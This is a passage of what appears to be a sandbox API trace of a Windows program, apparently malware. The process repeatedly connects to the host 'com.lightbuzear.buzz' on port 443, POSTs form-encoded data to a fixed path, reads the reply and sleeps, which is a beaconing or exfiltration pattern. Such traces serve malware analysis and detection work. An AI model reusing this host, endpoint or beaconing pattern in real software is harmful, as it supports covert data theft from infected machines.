Size=0x3) returned 0x47ce5c0 [0305.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0305.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0305.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0305.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca68 [0305.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0305.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef1e0 [0305.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0305.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef1e0 | out: hHeap=0x4780000) returned 1 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef258 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0305.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef398 [0305.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0305.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0305.077] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0305.078] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0305.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef398 | out: hHeap=0x4780000) returned 1 [0305.078] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0305.078] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0305.078] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0305.078] FreeLibrary (hLibModule=0x71570000) returned 1 [0305.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0305.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0305.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0305.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0305.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0305.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed08 | out: hHeap=0x4780000) returned 1 [0305.080] Sleep (dwMilliseconds=0x2710) [0305.122] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0305.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0305.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0305.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0305.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0305.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0305.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0305.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0305.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0305.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0305.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0305.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca08 [0305.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0305.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0305.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca08 | out: hHeap=0x4780000) returned 1 [0305.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c8b8 [0305.124] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0305.124] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0305.124] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0305.124] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0305.125] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0305.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0305.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0305.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0305.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0305.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0305.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0305.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0305.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0305.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0305.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca68 [0305.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0305.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca08 [0305.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0305.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0305.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca08 | out: hHeap=0x4780000) returned 1 [0305.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb00 [0305.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0305.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0305.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0305.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0305.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0305.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed08 [0305.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0305.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0305.127] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0305.128] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0305.128] FreeLibrary (hLibModule=0x71780000) returned 1 [0305.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed08 | out: hHeap=0x4780000) returned 1 [0305.129] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0305.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed08 [0305.129] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0305.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0305.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0305.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0305.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0305.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0305.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0305.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0305.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0305.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0305.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cb40 [0305.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0305.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca20 [0305.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb40 | out: hHeap=0x4780000) returned 1 [0305.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0305.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca20 | out: hHeap=0x4780000) returned 1 [0305.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ca80 [0305.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0305.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0305.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0305.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0305.132] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0305.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef208 [0305.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0305.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0305.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0305.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0305.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0305.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0305.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0305.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0305.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0305.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca20 [0305.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0305.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c870 [0305.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca20 | out: hHeap=0x4780000) returned 1 [0305.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0305.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c870 | out: hHeap=0x4780000) returned 1 [0305.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c8d0 [0305.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef410 [0305.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef410 | out: hHeap=0x4780000) returned 1 [0305.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0305.135] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0305.146] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0305.146] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c900 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cac8 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c900 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cac8 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef230 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0305.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef230 | out: hHeap=0x4780000) returned 1 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef1b8 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0305.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef1e0 [0305.148] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0305.149] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0305.149] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0305.149] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0305.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef1e0 | out: hHeap=0x4780000) returned 1 [0305.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0305.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0305.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0305.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0305.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0305.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0305.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0305.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0305.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0305.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cb28 [0305.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0305.151] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb40 [0305.151] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0305.151] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0305.151] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb40 | out: hHeap=0x4780000) returned 1 [0305.151] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef168 [0305.151] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0305.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0305.159] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef168 | out: hHeap=0x4780000) returned 1 [0305.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef1e0 [0305.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0305.159] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef230 [0305.160] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0305.160] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0305.160] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0305.160] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0306.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef230 | out: hHeap=0x4780000) returned 1 [0306.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0306.236] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0306.237] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0306.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0306.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0306.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0306.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0306.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0306.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0306.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0306.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0306.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0306.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c948 [0306.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0306.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9a8 [0306.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c948 | out: hHeap=0x4780000) returned 1 [0306.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0306.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0306.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef168 [0306.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0306.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0306.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef168 | out: hHeap=0x4780000) returned 1 [0306.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef0a0 [0306.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0306.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef0c8 [0306.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0306.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0306.240] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0306.241] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0306.241] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef0c8 | out: hHeap=0x4780000) returned 1 [0306.242] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0306.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0306.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0306.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0306.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0306.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0306.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0306.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0306.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0306.243] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0306.243] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cac8 [0306.243] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0306.243] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cae0 [0306.243] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cac8 | out: hHeap=0x4780000) returned 1 [0306.243] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0306.243] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cae0 | out: hHeap=0x4780000) returned 1 [0306.243] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eef60 [0306.243] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0306.243] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0306.244] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eef60 | out: hHeap=0x4780000) returned 1 [0306.244] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef050 [0306.244] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0306.244] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef078 [0306.244] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0306.244] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0306.245] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0306.246] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0306.246] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef078 | out: hHeap=0x4780000) returned 1 [0306.246] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0306.247] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0306.247] 